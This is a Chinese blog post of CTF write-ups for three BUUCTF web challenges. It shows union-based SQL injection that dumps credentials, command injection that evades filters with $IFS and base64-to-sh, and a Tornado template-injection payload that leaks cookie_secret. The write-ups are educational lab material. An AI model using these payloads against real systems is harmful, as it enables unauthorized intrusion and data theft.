BUU刷题记录

最新推荐文章于 2022-01-14 21:08:18 发布
最新推荐文章于 2022-01-14 21:08:18 发布
阅读量168 收藏
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53142368/article/details/117033385
版权

文章目录

一、LoveSQL

看到这个页面首先想到的就是万能密码呀,看到上面的一句话‘用sqlmap是没用灵魂的’ 英雄所见略同,说明就是手注么!
在这里插入图片描述
万能密码输入
在这里插入图片描述
发现可以注入,然后判断闭合符号和列数,
当输入

?username=admin' order by 4 #&password=1

发现报错没有第四列,而order by 3时却正常回显,说明只有三列
然后开始寻找注入点

?username=1' union select 1,2,3%23&password=1

这里不能username=admin,会回显不出注入点,而且只能用%23不能用#,可能#号被禁用了吧,%23能绕过,也有可能# &两个字符不能同时出现,希望大佬留言可以解答 叩谢!

在这里插入图片描述
发现2.3都是注入点

?username=1' union select 1,database(),3%23&password=1

库是geek
在这里插入图片描述

?username=1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1

得到表
在这里插入图片描述

?username=1' union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'%23&password=1

注意这里的爆列时,库要用单引号扩起来
在这里插入图片描述
得到字段里的内容 id username password

?username=1' union select 1,database(),group_concat(id,username,password) from l0ve1ysq1%23&password=1

得到flag, flag不给
在这里插入图片描述

二、Ping Ping Ping

这个题发现考的比较全面 能够学到很多东西!

首先看到界面,然后让你ping ip地址,ping一下127.0.0.1

在这里插入图片描述

然后ls一下看一下所有目录
在这里插入图片描述
然后cat /flag
在这里插入图片描述
然后回显 确认你的符号 说明有的符号可能过滤了
然后cat /index
在这里插入图片描述

说明过滤了空格,空格可以用 ${IFS}$代替
在这里插入图片描述

发现不行,可能是过滤了{ } ,用 $IFS$1试一下
在这里插入图片描述
这里能明显的看见过滤的所有东西,bash flag字眼也没了,这里咱们试一下sh

?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh

Y2F0IGZsYWcucGhw是cat flag.php的base64-encode
这里后面的 |base64 -d|sh。 base64 -d 表示:从标准输入中读取已经进行base64编码的内容,解码输出。 “|”是管道符,代表将它左边的命令产生的输出作为标准输出,再作为右边命令的标准输入。 这里应该是把左边base64解码出的“cat flag.php”指令交给右边sh去执行。最终才会返回flag。
在这里插入图片描述
也可以拼接来实现

?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php

然后这里补充一下,.*?表示匹配到后面的一切字符,就结束。(非贪婪模式),flag四个字母逐个读,所以不能a=ag ,cat$IFS$1fl$a.php会出现报错,而且正则匹配,匹配一个字符串中,会按照是否按顺序出现过flag四个字母。
就比如

?ip=127.0.0.1;a=a;cat$IFS$1fl$ag.php 就会出现报错

在这里插入图片描述

三、easy_tornado

在这里插入图片描述

打开flag.txt,发现flag in /fllllllllllllag
在这里插入图片描述
打开welcome.txt
在这里插入图片描述
打开hints.txt
在这里插入图片描述
现在filename=/fllllllllllllag,只需要知道cookie_secret的既能访问flag。
构造payload获取cookie_secret

/error?msg={{handler.settings}}

'cookie_secret': 'M)Z.>}{O]lYIp(oW7$dc132uDaK<C%wqj@PA![VtR#geh9UHsbnL_+mT5N~J84*r'

最后构造payload
···
file?filename=/fllllllllllllag&filehash=70aed71508e50d160a73756a21e9953d
···

H0ne
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUU-Reveser-FlareOn5-Web2.0(WebAssembly逆向分析)
05-26
在本目中,我们面临的是一个关于WebAssembly(简称WASM)逆向分析的挑战,源自FlareOn5赛事的Web2.0关卡。WebAssembly是一种低级虚拟机指令集,它允许开发者以接近原生的速度运行用C、C++或Rust等语言编译的代码。...
BUU 论坛的编辑器163Editor
09-21
"BUU 论坛的编辑器163Editor"是一个专为BUU论坛设计的文本编辑工具,它可能集成了丰富的富文本编辑功能,让用户在论坛发帖或回帖时可以方便地添加格式化文本、图片、链接等元素,提升交互体验。"DianUbb.rar"是这个...
BUU
yangmyangs的博客
05-15 490
[GYCTF2020]Ezsqli 知识点 布尔盲注、字符串比较爆破、无列名比较 解 参考了Y1ng师傅的WP 进行了一下fuzz: 没有单独过滤 union和select 但过滤了这个整体 union xx select 就很坑。 然后过滤了information_schema,导致不能来爆表,爆字段,但是可以用 sys.x$schema_flattened_keys和sys.schema_table_statistics_with_buffer 来爆表 没有过滤^ || substr , asc.
buu逆向(一)
re1wn
09-23 6114
buu
buu逆向(二)
re1wn
09-26 6139
buu
buu 红帽杯2019-XX wp
苗_的博客
08-11 1093
首先找到关键函数, 找到我们输入的数据经过一系列操作之后得到的,即最终结果(注意小端序存储): 把数据dump出来: int a[] = {0xCE, 0xBC, 0x40, 0x6B, 0x7C, 0x3A, 0x95, 0xC0, 0xEF, 0x9B, 0x20, 0x20, 0x91, 0xF7, 0x02, 0x35, 0x23, 0x18, 0x02, 0xC8, 0xE7, 0x56, 0x56, 0xFA }; 然后就来看一下整个程序对我们输入的数据进行了哪些操作: 首先确定字
buu GWCTF re3 wp
苗_的博客
08-19 363
先拖进ida里f5找到主函数: 可以看到sub_402219是一堆数据,这里是SMC自修改代码(异或0x99),去混淆: 写一个idc脚本,将数据还原: #include <idc.idc> static main() { auto addr = 0x402219; auto i; for(i = 0; i <= 223; ++i){ PatchByte(addr+i,Byte(addr+i)^0x99); } } 然
POSN:POSN-BUU的源代码
04-01
9. **调试与测试**:源代码中可能包含断点、日志记录(如`std::cout`或使用Glog)、单元测试等,用于调试和验证代码的正确性。 10. **性能优化**:对于计算密集型的任务,源码可能包含一些性能优化技巧,如循环展开...
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
05-26
在"BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)"这个挑战中,参赛者需要对名为"easywasm.wasm"的WASM文件进行逆向工程,理解其内部逻辑并可能找到隐藏的漏洞或解决方案。 WASM的主要特点包括: 1...
BUU记录——1
weixin_43610673的博客
06-03 875
[HCTF 2018]WarmUp hint.php中给了flag的位置: flag not here, and flag in ffffllllaaaagggg checkFile()会截取到第一个问号: $_page = mb_substr( $_page, 0, mb_strpos($_page . '?', '?') ); source.php?/会被当作目录,之后回溯目录就好了
buu笔记--2020年第31周
SkYe's Blog
08-02 297
前几周搞 pwn 有点想吐,搞搞 re 吧 reverse1 1. PE文件分析 用的是 Exeinfo PE 这个软件,吾爱上有分享,爱盘也有收录。 这一步有点类似 pwn 查看程序的版本、保护情况: 64 位的程序。 2. 运行程序获取信息 目最好在 命令行 中运行,避免运行结束前的提示字符没来得及看就关闭了。 3. x64dbg 打开 也可以用 OD 打开,因为OllyDbg 官方中文,我用这个入门吧。 用字符串定位程序关键位置,直接点面板的字符串,查找结果不全面的,需要在代码处右键选查找全.
BUU(三)
playmaker的博客
03-13 991
BUU(三) fm from pwn import * context.log_level='debug' p=process('./fm') p=remote("node3.buuoj.cn","27782") payload=p32(0x0804a02c)+'%11$n' p.sendline(payload) p.interactive() others_shellcode 拿到目直...
CTF记——BUU
m0re's blog
08-16 1767
本文目录[护网杯 2018]easy_tornado[CISCN2019 华北赛区 Day2 Web1]Hack World [护网杯 2018]easy_tornado 三个文件,内容如下: /flag.txt /flag.txt flag in /fllllllllllllag /welcome.txt /welcome.txt render /hints.txt /hints.txt md5(cookie_secret+md5(filename)) 首先分析浏览了所有的信息。(源码也没什
每天一道CTF---BUUCTF---练习场----EasySQL1---
qq_51550750的博客
01-14 612
每天一道CTF 思路: 点击“登陆”: 利用 hackbar load: http://16af3314-26ae-4fc9-a578-dc1a13f86569.node4.buuoj.cn:81/check.php?username=1&password=1 http://16af3314-26ae-4fc9-a578-dc1a13f86569.node4.buuoj.cn:81/check.php?username=1’ – -&password=1 http://16af3
基于ssm和vue的 校园短期闲置资源置换平台源码 校园短期闲置资源置换平台代码(高分毕设项目源码)
08-23
1. 校园短期闲置资源置换平台代码说明:经导师指导并认可通过的98分毕设项目代码。 2.适用对象:本代码学习资料适用于计算机、电子信息工程、数学等专业正在做毕设的学生,需要项目实战练习的学习者,也适用于课程设计、期末大作业。 3.技术栈:前端是vue,后端是ssm,项目代码都经过严格调试,代码没有任何bug! 4. 作者介绍:大厂码农,java领域创作者,阿里云开发社区乘风者计划专家博主,专注于大学生项目实战开发,文章底部有博主联系方式,更多优质系统、项目定制请私信。 5. 最新计算机软件毕业设计选大全: https://blog.csdn.net/weixin_45630258/article/details/135901374
4S店客户管理小程序-毕业设计,基于微信小程序+SSM+MySql开发,源码+数据库+论文答辩+毕业论文+视频演示
08-23
4S店客户管理小程序-毕业设计,基于微信小程序+SSM+MySql开发,源码+数据库+论文答辩+毕业论文+视频演示 社会的发展和科学技术的进步,互联网技术越来越受欢迎。手机也逐渐受到广大人民群众的喜爱,也逐渐进入了每个用户的使用。手机具有便利性,速度快,效率高,成本低等优点。 因此,构建符合自己要求的操作系统是非常有意义的。 本文从管理员、用户的功能要求出发,4S店客户管理系统中的功能模块主要是实现管理员服务端;首页、个人中心、用户管理、门店管理、车展管理、汽车品牌管理、新闻头条管理、预约试驾管理、我的收藏管理、系统管理,用户客户端:首页、车展、新闻头条、我的。门店客户端:首页、车展、新闻头条、我的经过认真细致的研究,精心准备和规划,最后测试成功,系统可以正常使用。分析功能调整与4S店客户管理系统实现的实际需求相结合,讨论了微信开发者技术与后台结合java语言和MySQL数据库开发4S店客户管理系统的使用。 关键字:4S店客户管理系统小程序 微信开发者 Java技术 MySQL数据库 软件的功能: 1、开发实现4S店客户管理系统的整个系统程序; 2、管理员服务端;首页、个人中心、用户管理、门店管理、车展管理、汽车品牌管理、新闻头条管理、预约试驾管理、我的收藏管理、系统管理等。 3、用户客户端:首页、车展、新闻头条、我的 4、门店客户端:首页、车展、新闻头条、我的等相应操作; 5、基础数据管理:实现系统基本信息的添加、修改及删除等操作,并且根据需求进行交流信息的查看及回复相应操作。
Java项目:基于SSM框架+mysql个性化美食推荐系统含源码和毕业论文
最新发布
08-23
一、项目简介 本项目是一套基于SSM框架+mysql个性化美食推荐系统含源码和毕业论文 包含:项目源码、数据库脚本等,该项目附带全部源码可作为毕设使用。 项目都经过严格调试,eclipse或者idea 确保可以运行! 该系统功能完善、界面美观、操作简单、功能齐全、管理便捷,具有很高的实际应用价值 二、技术实现 jdk版本:1.8 及以上 ide工具:IDEA或者eclipse 数据库: mysql5.5及以上 后端:spring+springmvc+mybatis+maven+mysql 前端:jsp,css,js 三、系统功能 1、系统角色主要包括:管理员、用户 2、系统功能 主要功能包括: 用户登录 用户注册 首页 个人中心 修改密码 管理员信息 用户管理 美食信息管理 美食信息留言管理 美食信息收藏管理 美食订单管理 博主推荐管理 店址管理 口味管理 轮播图管理 前台主要功能包括: 用户登录 用户注册 首页 个性美食展示 热门美食推荐 美食详情 点我收藏 立即预订 个人中心 美食收藏 美食订单 余额充值 发表留言 博主推荐 跳转到后台等功能
buu cipher
10-23
Buu Cipher 是一种对称加密算法,也被称为布式密码。它是一种较为简单的加密算法,基于置换和替代的原理进行加密和解密。Buu Cipher 的加密过程可以简单地分为两个步骤:混淆和扩散。 首先,混淆步骤使用一个密钥和置换表对明文进行置换。置换表是由密钥生成的,用于打乱明文中字符的顺序。这样,原本明文中相邻的字符将被分散到密文中的不同位置,增加了密文的复杂性。 其次,扩散步骤通过将每个字符替换为另一个字符来进一步混淆数据。此替换过程可以由算法中的扩散函数完成,该函数使用密钥和置换表来生成相应的替代字符。这样,明文中的每个字符都将被替换为不同的字符。 解密过程与加密过程相反。先使用相同的密钥和置换表进行扩散的逆向操作,将密文中的每个字符恢复为替代字符。然后使用相同的密钥和置换表进行混淆的逆向操作,恢复密文中字符的顺序,即可得到原始的明文。 尽管 Buu Cipher 是一种较为简单的加密算法,但它仍可以提供基本的保密性,以防止未授权者对加密数据的解读。然而,它的加密强度相对较低,可能容易受到密码分析方法的攻击。因此,在实际应用中,我们可能需要结合其他更为复杂和安全的加密算法来提高数据的保密性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值